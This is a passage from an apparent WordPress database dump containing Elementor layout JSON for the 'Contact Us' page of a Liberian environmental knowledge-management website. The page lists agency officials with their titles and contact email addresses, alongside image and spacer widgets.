up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14845,2355,'_elementor_edit_mode','builder'),(14846,2355,'_elementor_template_type','wp-page'),(14847,2355,'_elementor_version','2.7.5'),(14848,2355,'_wp_page_template','default'),(14849,2355,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"edi